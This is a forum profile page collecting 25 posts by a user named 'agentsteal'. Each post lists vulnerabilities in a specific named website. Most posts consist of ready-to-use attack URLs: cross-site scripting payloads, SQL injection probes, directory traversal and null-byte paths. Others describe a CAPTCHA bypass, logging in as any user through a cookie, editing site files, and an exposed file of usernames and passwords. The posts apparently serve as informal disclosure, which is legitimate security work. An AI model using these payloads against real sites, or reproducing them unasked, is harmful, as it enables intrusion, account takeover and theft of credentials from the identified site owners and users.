agentsteal

Everything posted by agentsteal

  1. Array: http://www.themespot.info/blog/article.php?id_art[] Array: http://www.themespot.info/blog/topic.php?id_top[] Cross Site Scripting: http://www.themespot.info/blog/article.php?id_art=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.themespot.info/index.php?page=themes&sortorder="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.themespot.info/index.php?page=themes&sortby="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.themespot.info/blog/topic.php?id_top=<marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting when you upload a theme. Drop Down Menu: If you edit the drop down menus on http://www.themespot.info/index.php?page=themes you can submit arbitrary values. Full Path Disclosure: http://www.themespot.info/~gamerz Full Path Disclosure: http://www.themespot.info/Files/ Full Path Disclosure: http://www.themespot.info/Files/home.php Full Path Disclosure: http://www.themespot.info/index.php?page=themes&pageno=a SQL Error: http://www.themespot.info/blog/article.php SQL Error: http://www.themespot.info/blog/topic.php SQL Injection: http://www.themespot.info/blog/article.php?id_art=5 AND 1=1 http://www.themespot.info/blog/article.php?id_art=5 AND 1=2 SQL Injection: http://www.themespot.info/blog/topic.php?id_top=2 AND 1=1 http://www.themespot.info/blog/topic.php?id_top=2 AND 1=2 User Enumeration: http://www.themespot.info/~gamerz User Enumeration: http://www.themespot.info/~root
  2. Cross Site Scripting: http://us.scriptscribes.net/_<marquee>vulnerable</marquee> Full Path Disclosure: http://www.scriptscribes.net/projects/us/user_system/modules/acp.php User Enumeration http://www.scriptscribes.net/~nobody User Enumeration: http://www.scriptscribes.net/~root User Enumeration: http://www.scriptscribes.net/~scriptsc
  3. Array: http://www.themafiaman.com/confirm.php?referer[] Array: http://www.themafiaman.com/signup.php?step[] Array: http://www.themafiaman.com/signup.php?step=3&age[] Array: http://www.themafiaman.com/signup.php?step=3&cpassword[] Array: http://www.themafiaman.com/signup.php?step=3&email[] Array: http://www.themafiaman.com/signup.php?step=3&first[] Array: http://www.themafiaman.com/signup.php?step=3&last[] Array: http://www.themafiaman.com/signup.php?step=3&messager_id[] Array: http://www.themafiaman.com/signup.php?step=3&password[] Array: http://www.themafiaman.com/signup.php?step=3&refer[] Array: http://www.themafiaman.com/signup.php?step=3&username[] Array: http://www.themafiaman.com/signup.php?step=4&email[] Array: http://www.themafiaman.com/signup.php?step=4&referer[] Cross Site Scripting: http://www.themafiaman.com/confirm.php?referer="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.themafiaman.com/signup.php?step=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.themafiaman.com/signup.php?step=3&age="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.themafiaman.com/signup.php?step=3&cpassword="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.themafiaman.com/signup.php?step=3&email="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.themafiaman.com/signup.php?step=3&first="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.themafiaman.com/signup.php?step=3&last="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.themafiaman.com/signup.php?step=3&messager_id="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.themafiaman.com/signup.php?step=3&password="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.themafiaman.com/signup.php?step=3&refer="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.themafiaman.com/signup.php?step=3&username="><marquee><h1>vulnerable</marquee> Cross Site 
Scripting: http://www.themafiaman.com/signup.php?step=4&email=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.themafiaman.com/signup.php?step=4&referer="><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting on http://www.themafiaman.com/confirm.php if the email address contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.themafiaman.com/resend.php if the email address contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.themafiaman.com/support.php if the To field contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.themafiaman.com/tellthem.php if the Your Name field contains ">code. Cross Site Scripting: There is Cross Site Scripting on http://www.themafiaman.com/tellthem.php if the Friends Name field contains ">code. Cross Site Scripting: There is Cross Site Scripting on http://www.themafiaman.com/tellthem.php if the Friends Email field contains ">code. Cross Site Scripting: There is Cross Site Scripting on http://www.themafiaman.com/tellthem.php if the Refferal Link field contains ">code. Cross Site Scripting: There is Cross Site Scripting on http://www.themafiaman.com/winners.php if the drop down menus contain code. Cross Site Scripting: There is Cross Site Scripting if you submit a directory search that contains code. Cross Site Scripting: There is Cross Site Scripting if you submit a family search that contains code. Drop Down Menu: If you edit the drop down menu on http://www.themafiaman.com/winners.php you can submit arbitrary values. Drop Down Menu: If you edit the round drop down menu on http://www.themafiaman.com/credits.php you can submit arbitrary values. Maximum Length: If you edit the fields you can remove the maximum lengths. User Enumeration: http://www.themafiaman.com/~root
  4. Insecure Cookie: You shouldn't put the password in the cookie. Insecure Cookie: You shouldn't put the username in the cookie. URL Inclusion: http://www.iraqresearch.org/go/google.com User Enumeration: http://www.iraqresearch.org/~nobody User Enumeration: http://www.iraqresearch.org/~root
  5. Cross Site Scripting: There is Cross Site Scripting in the messages if the name contains code. Cross Site Scripting: There is Cross Site Scripting if the namecookie cookie contains ">code. Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Maximum name length field contains ">code. Cross Site Scripting: There is Cross Site Scripting in the shoutbox if the Maximum name length field contains ">code. Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Number of shouts to display field contains ">code. Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Maximum shout length field contains ">code. Cross Site Scripting: There is Cross Site Scripting in the shoutbox if the Maximum shout length field contains ">code. Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Add a space in words longer than (chars) field contains ">code. There is Cross Site Scripting in the admin panel if the Main text color (hex) field contains ">code. There is Cross Site Scripting in the shoutbox if the Main text color (hex) field contains </style>code. There is Cross Site Scripting in the admin panel if the Main text font family field contains ">code. There is Cross Site Scripting in the shoutbox if the Main text font family field contains </style>code. There is Cross Site Scripting in the admin panel if the Main text font size (pt) field contains ">code. There is Cross Site Scripting in the shoutbox if the Main text font size (pt) field contains </style>code. There is Cross Site Scripting in the admin panel if the Shoutboxer border color (hex) field contains ">code. There is Cross Site Scripting in the shoutbox if the Shoutboxer border color (hex) field contains </style>code. There is Cross Site Scripting in the admin panel if the Shoutboxer border size (px) field contains ">code.
There is Cross Site Scripting in the shoutbox if the Shoutboxer border size (px) field contains </style>code. There is Cross Site Scripting in the admin panel if the Header writing field contains ">code. There is Cross Site Scripting in the shoutbox if the Header writing field contains code. There is Cross Site Scripting in the admin panel if the Header background color (hex) field contains ">code. There is Cross Site Scripting in the shoutbox if the Header background color (hex) field contains </style>code. There is Cross Site Scripting in the admin panel if the Header text color (hex) field contains ">code. There is Cross Site Scripting in the shoutbox if the Header text color (hex) field contains </style>code. There is Cross Site Scripting in the admin panel if the Shout button value field contains ">code. There is Cross Site Scripting in the shoutbox if the Shout button value field contains ">code. There is Cross Site Scripting in the admin panel if the Main form background color (hex) field contains ">code. There is Cross Site Scripting in the shoutbox if the Main form background color (hex) field contains </style>code. There is Cross Site Scripting in the admin panel if the Form input background color (hex) field contains ">code. There is Cross Site Scripting in the shoutbox if the Form input background color (hex) field contains </style>code. There is Cross Site Scripting in the admin panel if the Form input border color (hex) field contains ">code. There is Cross Site Scripting in the shoutbox if the Form input border color (hex) field contains </style>code. There is Cross Site Scripting in the admin panel if the Form input border size (px) field contains ">code. There is Cross Site Scripting in the shoutbox if the Form input border size (px) field contains </style>code. There is Cross Site Scripting in the admin panel if the Form input text color (hex) field contains ">code. 
There is Cross Site Scripting in the shoutbox if the Form input text color (hex) field contains </style>code. There is Cross Site Scripting in the admin panel if the First shout row background color (hex) field contains ">code. There is Cross Site Scripting in the shoutbox if the First shout row background color (hex) field contains </style>code. There is Cross Site Scripting in the admin panel if the Alternating shout row background color (hex) field contains ">code. There is Cross Site Scripting in the shoutbox if the Alternating shout row background color (hex) field contains </style>code. There is Cross Site Scripting in the admin panel if the Ban notification text color (hex) field contains ">code. There is Cross Site Scripting in the shoutbox if the Ban notification text color (hex) field contains </style>code. Cross Site Scripting: There is Cross Site Scripting if the Sort by drop down menus contain code. Cross Site Scripting: There is Cross Site Scripting if the Sort by drop down menus contain ">code. Cross Site Scripting: There is Cross Site Scripting if the Shouts per page field contains code. Cross Site Scripting: There is Cross Site Scripting if you ban a word that contains code. Cross Site Scripting: There is Cross Site Scripting if you ban an ip address that contains code. Drop Down Menu: If you edit the Order drop down menu you can submit arbitrary values. Drop Down Menu: If you edit the Sort by drop down menu you can submit arbitrary values. 
Full Path Disclosure: http://www.diondesign.net/index.php?p=contact Full Path Disclosure: http://www.diondesign.net/index.php?p=images Full Path Disclosure: http://www.diondesign.net/index.php?p=scripts Full Path Disclosure: http://www.diondesign.net/index.php?p=services Full Path Disclosure: http://www.diondesign.net/index.php?p=websites Full Path Disclosure: http://www.diondesign.net/shoutboxer/sbxr_get.php Full Path Disclosure: http://www.diondesign.net/shoutboxer/sbxr_send.php Full Path Disclosure: There is Full Path Disclosure if the PHPSESSID cookie is set to an invalid value. Full Path Disclosure: There is Full Path Disclosure if the Number of shouts to display in the admin panel is set to an invalid value. Full Path Disclosure: There is Full Path Disclosure if the Shouts per page field contains an invalid value. Maximum Length: If you edit the fields in the admin panel you can remove the maximum lengths. Maximum Length: If you edit the message field you can remove the maximum length. Maximum Length: If you edit the name field you can remove the maximum length. SQL Error: There is an SQL Error in the admin panel if there are no messages. SQL Error: There is an SQL Error if the Order drop down menus contain an invalid value. SQL Error: There is an SQL Error if the Sort by drop down menus contain an invalid value. User Enumeration: http://www.diondesign.net/~kjdion
  6. Array: http://student.cse.fau.edu/~gstark1/php/includes/restaurants.php?start[] Array: http://student.cse.fau.edu/~gstark1/php/includes/rot_13.php?input[] Cross Site Scripting: http://student.cse.fau.edu/~gstark1/php/includes/restaurants.php?start='><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://student.cse.fau.edu/~gstark1/php/includes/rot_13.php?input=<znedhrr><u1>ihyarenoyr</znedhrr> Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. Full Path Disclosure: http://student.cse.fau.edu/~gstark1/php/includes/database_connect.php Full Path Disclosure: There is Full Path Disclosure if the PHPSESSID cookie is set to an invalid value. Includes Directory: http://student.cse.fau.edu/~gstark1/password/ Includes Directory: http://student.cse.fau.edu/~gstark1/php/
  7. Cross Site Scripting: There is Cross Site Scripting on http://alliedcreed.awardspace.com/bank/bank.php if the withdraw field contains code. Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. DOS: http://alliedcreed.awardspace.com/players.php/ DOS: http://alliedcreed.awardspace.com/test.php/ DOS: http://alliedcreed.awardspace.com/town.php/ DOS: http://alliedcreed.awardspace.com/updates.php/ Full Path Disclosure: http://alliedcreed.awardspace.com/forum/acforum.php Full Path Disclosure: http://alliedcreed.awardspace.com/forum/bsforum.php Full Path Disclosure: http://alliedcreed.awardspace.com/forum/connect.php Full Path Disclosure: There is Full Path Disclosure if the PHPSESSID cookie is set to an invalid value. User Enumeration: http://alliedcreed.co.nr/~nobody User Enumeration: http://alliedcreed.co.nr/~root
  8. Cross Site Scripting: There is Cross Site Scripting on the forgot password page if your email address contains code. Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain ">code. Full Path Disclosure: http://www.thirdoctave.com/page_footer.php Full Path Disclosure: http://www.thirdoctave.com/test/test/echo.php Full Path Disclosure: http://www.thirdoctave.com/test/test/test.php Full Path Disclosure: There is Full Path Disclosure if the PHPSESSID cookie is set to an invalid value. Insecure Cookie: You shouldn't put the password in the cookie. Insecure Cookie: You shouldn't put the username in the cookie. User Enumeration: http://www.thirdoctave.com/~root User Enumeration: http://www.thirdoctave.com/~thirdoct
  9. Admin Access: Anyone can access the admin panel. Cross Site Scripting: There is Cross Site Scripting if your username contains code. Cross Site Scripting: There is Cross Site Scripting in the chat if a message contains code. Directory Traversal: http://www.roddzilla.com/?page=../index Directory Traversal: http://www.roddzilla.com/?page=../modules/do Full Path Disclosure: http://www.roddzilla.com/?page[] Full Path Disclosure: http://www.roddzilla.com/pages/fbchat.php Full Path Disclosure: http://www.roddzilla.com/img.php Full Path Disclosure: http://www.roddzilla.com/img.php?t[] Full Path Disclosure: http://www.roddzilla.com/img.php?t&s[] Includes Directory: http://www.roddzilla.com/modules/ Includes Directory: http://www.roddzilla.com/pages/ Poison Null Byte: http://www.roddzilla.com/?page=../images/banner.jpg%00
  10. Array: http://www.games4uonline.com/mylogos/download.php?name[] Array: http://www.games4uonline.com/mylogos/test3.php?name[] Array: http://www.games4uonline.com/mylogos/view.php?name[] Cross Site Scripting: http://www.games4uonline.com/mylogos/view.php?name='><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.games4uonline.com/mylogos/view.php?name=</title><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. Full Path Disclosure: http://www.games4uonline.com/mylogos/test2.php Full Path Disclosure: http://www.games4uonline.com/mylogos/test2.php?name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Full Path Disclosure: http://www.games4uonline.com/mylogos/test2.php?name=a Full Path Disclosure: http://www.games4uonline.com/mylogos/test2.php?name[] Full Path Disclosure: 
http://www.games4uonline.com/mylogos/test3.php Full Path Disclosure: http://www.games4uonline.com/mylogos/test4.php Full Path Disclosure: http://www.games4uonline.com/mylogos/test4.php?name=a Full Path Disclosure: http://www.games4uonline.com/mylogos/test4.php?name[] Insecure Cookie: You shouldn't put the ipaddress in the cookie.
  11. Array: http://www.writebush.com/search.php?words[] Cross Site Scripting: http://www.writebush.com/search/"><marquee><h1>vulnerable</marquee> Full Path Disclosure: http://www.writebush.com/search.php?cmd[] Full Path Disclosure: http://www.writebush.com/search.php?words[] Full Path Disclosure: http://www.writebush.com/theletter.php?page Full Path Disclosure: http://www.writebush.com/theletter.php?page[]
  12. Array: http://ryan.crawford.com/yjfc/flyin07/?v=meta&file[] Cross Site Scripting: http://ryan.crawford.com/yjfc/flyin07/?v=meta&file="><marquee><h1>vulnerable</marquee> Directory Traversal: http://ryan.crawford.com/yjfc/flyin07/?v=meta&file=../../oshkosh/Glenn Oshkosh/DSCN5637.JPG DOS: http://ryan.crawford.com/yjfc/flyin07/?act=auth Full Path Disclosure: http://ryan.crawford.com/yjfc/flyin07/?v=meta Full Path Disclosure: http://ryan.crawford.com/yjfc/flyin07/?v=meta&file=a
  13. CAPTCHA: The solution for the CAPTCHA is on the page. CAPTCHA: You can bypass the CAPTCHA by setting the showverify cookie to false. Cross Site Scripting: There is Cross Site Scripting if you set the lastimage cookie to ">code. Directory Traversal: There is Directory Traversal if you set the lastimage cookie to ../icons/a.gif.
  14. Admin Access: You can view and edit the site's source code through the Directory Traversal. Array: http://www.games4uonline.com/sites/write.php?file[] Array: http://www.games4uonline.com/sites/writenew.php?file[] Cross Site Scripting: There is Cross Site Scripting if the File Name field on http://www.games4uonline.com/sites/new.php contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.games4uonline.com/sites/upload/flash_upload.php if the folder field contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.games4uonline.com/sites/upload/flash_upload.php if the myFile3 field contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.games4uonline.com/sites/upload/flash_upload.php if the submit field contains code. Cross Site Scripting: http://www.games4uonline.com/sites/writenew.php?file='><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. Cross Site Scripting: There is Cross Site Scripting if the Folder Name field on http://www.games4uonline.com/sites/newfolder.php contains code. Cross Site Scripting: There is Cross Site Scripting if your username contains code. Directory Traversal: http://www.games4uonline.com/sites/new.php?folder=../ Directory Traversal: http://www.games4uonline.com/sites/newfolder.php?folder=../ Directory Traversal: http://www.games4uonline.com/sites/writenew.php?file=../index.html Directory Traversal: You can make folders in any directory by registering with the username set to ../filename. DOS: There is a DOS when you register. Full Path Disclosure: http://www.games4uonline.com/sites/login/register2.php Full Path Disclosure: http://www.games4uonline.com/sites/write.php Full Path Disclosure: http://www.games4uonline.com/sites/writenew.php?file=a Full Path Disclosure: There is Full Path Disclosure when you register.
Full Path Disclosure: There is Full Path Disclosure when you register if you submit a null username. Full Path Disclosure: There is Full Path Disclosure when you register if your username has already been registered. Full Path Disclosure: There is Full Path Disclosure when you register if your username is the name of a folder. Includes Directory: http://www.games4uonline.com/sites/login/ Insecure Cookie: You shouldn't put the ip address in the cookie. There is a list of usernames and passwords: http://www.games4uonline.com/sites/login/userpwd.txt You can make files and folders on the site. http://www.games4uonline.com/sites/files.php POC: http://www.games4uonline.com/sites/agentsteal.html You can make folders on the site by registering with the username set to the filename. You can edit files on the site. http://www.games4uonline.com/sites/writenew.php?file=index.htm
  15. Array: http://www.best-nights-out.com/index.php?page[] Cross Site Scripting: There is Cross Site Scripting if the genre field contains code. Cross Site Scripting: There is Cross Site Scripting if you submit a search that contains '>code. Cross Site Scripting: There is Cross Site Scripting if you submit code in the add drop down menus. Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain '>code. Directory Traversal: http://www.best-nights-out.com/index.php?page=src/mailer Drop Down Menu: If you edit the drop down menus in the header you can submit arbitrary values. Drop Down Menu: If you edit the drop down menus on the add page you can submit arbitrary values. Drop Down Menu: If you edit the Favorite Music drop down menu you can submit arbitrary values. Full Path Disclosure: http://www.best-nights-out.com/index.php?page=browse Full Path Disclosure: http://www.best-nights-out.com/browse.php Full Path Disclosure: http://www.best-nights-out.com/src/common.php Full Path Disclosure: http://www.best-nights-out.com/home.php Full Path Disclosure: http://www.best-nights-out.com/index.php?page=a Full Path Disclosure: http://www.best-nights-out.com/logout.php Full Path Disclosure: There is Full Path Disclosure if you submit an invalid value in the Country drop down menu in the header.
Include Directory: http://www.best-nights-out.com/src/ PHP Source Code Disclosure: http://www.best-nights-out.com/src/common.php~ PHP Source Code Disclosure: http://www.best-nights-out.com/contact.php~ PHP Source Code Disclosure: http://www.best-nights-out.com/src/dbcommon.php~ PHP Source Code Disclosure: http://www.best-nights-out.com/src/htmldata.php~ PHP Source Code Disclosure: http://www.best-nights-out.com/src/java.js~ PHP Source Code Disclosure: http://www.best-nights-out.com/css/any/Style.css~ PHP Source Code Disclosure: http://www.best-nights-out.com/css/alternative/Style.css~ PHP Source Code Disclosure: http://www.best-nights-out.com/css/dance_club/Style.css~ PHP Source Code Disclosure: http://www.best-nights-out.com/css/emo/Style.css~ PHP Source Code Disclosure: http://www.best-nights-out.com/css/goth/Style.css~ PHP Source Code Disclosure: http://www.best-nights-out.com/css/jazz/Style.css~ PHP Source Code Disclosure: http://www.best-nights-out.com/css/metal/Style.css~ PHP Source Code Disclosure: http://www.best-nights-out.com/css/pop/Style.css~ PHP Source Code Disclosure: http://www.best-nights-out.com/css/punk/Style.css~ PHP Source Code Disclosure: http://www.best-nights-out.com/css/r&b_hip-hop/Style.css~ PHP Source Code Disclosure: http://www.best-nights-out.com/css/reggae/Style.css~ PHP Source Code Disclosure: http://www.best-nights-out.com/css/rock/Style.css~ SQL Error: There is an SQL Error if you submit invalid values in the add drop down menus. SQL Error: There is an SQL Error if you submit an invalid value in the Favorite Music field.
  16. Cross Site Scripting: There is Cross Site Scripting if the remember cookie contains ">code. Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain ">code. Full Path Disclosure: http://www.my-linkpage.com/scripts/connection.class.php PHP Source Code Disclosure: http://www.my-linkpage.com/scripts/ URL Inclusion: There is a URL Inclusion vulnerability on http://www.my-linkpage.com/scripts/form.html if you search for a URL. User Enumeration: http://www.my-linkpage.com/~root User Enumeration: http://www.my-linkpage.com/~stlewis
  17. Array: http://www.campuscrawler.com/goodstats/?add=1&url2[] Array: http://www.campuscrawler.com/goodstats/index.php?page[]&code=1 Cross Site Scripting: http://www.campuscrawler.com/goodstats/index.php?page=</textarea><marquee><h1>vulnerable&code=1 Cross Site Scripting: There is Cross Site Scripting if you submit code in the drop down menus in the calendar. Cross Site Scripting: There is Cross Site Scripting on the Edit a Page page if the fields contain </textarea>code. Drop Down Menu: If you edit the drop down menus in the calendar you can submit arbitrary values. Drop Down Menu: If you edit the drop down menus on http://www.campuscrawler.com/goodstats/map.php you can submit arbitrary values. Drop Down Menu: If you edit the drop down menus on the Calibrate Heat Map page you can submit arbitrary values. Full Path Disclosure: http://www.campuscrawler.com/goodstats/index.php?view=1&page=a Full Path Disclosure: http://www.campuscrawler.com/goodstats/graph.php Full Path Disclosure: http://www.campuscrawler.com/goodstats/graph2.php Full Path Disclosure: http://www.campuscrawler.com/goodstats/includes/report.php Full Path Disclosure: http://www.campuscrawler.com/goodstats/includes/report2.php Full Path Disclosure: http://www.campuscrawler.com/goodstats/includes/showtool.php Full Path Disclosure: http://www.campuscrawler.com/goodstats/map.php?page=a Full Path Disclosure: http://www.campuscrawler.com/goodstats/templates/sidebar.php Full Path Disclosure: There is Full Path Disclosure if you submit invalid values in the drop down menus in the calendar. Includes Directory: http://www.campuscrawler.com/goodstats/includes/ Insecure Cookie: You shouldn't put the password in the cookie. Insecure Cookie: You shouldn't put the username in the cookie.
  18. Array: http://www.getyourlinkon.net/links.php?type[] Array: http://www.getyourlinkon.net/member.php?user[] Cross Site Scripting: http://www.getyourlinkon.net/links.php?type='><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. Cross Site Scripting: There is Cross Site Scripting when you add a link if the filename contains code. Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code. Full Path Disclosure: http://www.getyourlinkon.net/test.php
  19. Full Path Disclosure: http://www.mobilereelz.com/test.php Includes Directory: http://www.mobilereelz.com/temp/
  20. Log: http://forumpix.getmyip.com/log.txt User Enumeration: http://forumpix.getmyip.com/~nobody
  21. Cross Site Scripting: There is Cross Site Scripting on http://www.brentmorine.com/seedswaps/site_pages/index.php?do=seedsofinterest if the Number of Seeds of Interest field contains code. Drop Down Menu: If you edit the Seed drop down menu on http://www.brentmorine.com/seedswaps/site_pages/index.php?do=fillrequest you can submit arbitrary values. Full Path Disclosure: There is Full Path Disclosure if you upload an invalid image. Full Path Disclosure: There is Full Path Disclosure on http://www.brentmorine.com/seedswaps/site_pages/index.php?do=fillrequest if you set the Seed drop down menu to a negative number. User Enumeration: http://www.brentmorine.com/~brentmor User Enumeration: http://www.brentmorine.com/~nobody User Enumeration: http://www.brentmorine.com/~root User Enumeration: http://www.seedswaps.com/~brentmor User Enumeration: http://www.seedswaps.com/~nobody User Enumeration: http://www.seedswaps.com/~root
  22. Cross Site Scripting: http://h1.ripway.com/Bethrezen/demo/phpinfo.php/<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/index.php/<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/Navigation/footer.php/<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/Navigation/menu.php/<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/Switch/link-switcher.php/<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/Switch/page-switcher.php/<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/Switch/style-switcher.php/<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/Switch/title-switcher.php/<marquee><h1>vulnerable</marquee> Full Path Disclosure: http://h1.ripway.com/Bethrezen/demo/phpinfo.php Full Path Disclosure: http://h1.ripway.com/Bethrezen/demo/phpinfo.php/a Full Path Disclosure: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/index.php/ Full Path Disclosure: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/Navigation/footer.php Full Path Disclosure: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/Navigation/footer.php/a Full Path Disclosure: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/index.php/a Full Path Disclosure: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/Navigation/menu.php/a Full Path Disclosure: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/Switch/link-switcher.php/a Full Path Disclosure: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/Switch/page-switcher.php/ Full Path Disclosure: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/Switch/style-switcher.php/a Full Path Disclosure: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/Switch/title-switcher.php/a
  23. Array: http://www.getyourlinkon.net/member.php?user[] Array: http://www.getyourlinkon.net/viewrequest.php?title[] Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. Cross Site Scripting: There is Cross Site Scripting on the Links page if the fields contain 'code. Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code. Directory Traversal: http://www.getyourlinkon.net/member.php?user=../request/agentsteal Directory Traversal: You can make txt files in any directory by registering with the username set to ../filename. Directory Traversal: You can make txt files in any directory by requesting a link with the title set to ../filename. Full Path Disclosure: http://www.getyourlinkon.net/test.php Insecure Cookie: You shouldn't put the username in the cookie. You can log in as any user by setting the auth cookie to their username. You can make txt files in http://www.getyourlinkon.net/members/ by registering with the username set to the filename. You can make txt files in http://www.getyourlinkon.net/request/ by requesting a link with the title set to the filename.
  24. Drop Down Menu: If you edit the Rate drop down menu you can submit arbitrary values. Full Path Disclosure: http://www.pokerdepositoptions.com/admin/admin.php Includes Directory: http://www.pokerdepositoptions.com/admin/ Includes Directory: http://www.pokerdepositoptions.com/includes/ Includes Directory: http://www.pokerdepositoptions.com/new/ Insecure Cookie: You shouldn't put the username in the cookie. User Enumeration: http://www.pokerdepositoptions.com/~poker User Enumeration: http://www.pokerdepositoptions.com/~root
  25. Array: http://infinitevortex.6te.net/memberscript/account.php?user[] Cross Site Scripting: http://infinitevortex.6te.net/memberscript/account.php?user="onmouseover=alert('vulnerable')> User Enumeration: http://infinitevortex.6te.net/~root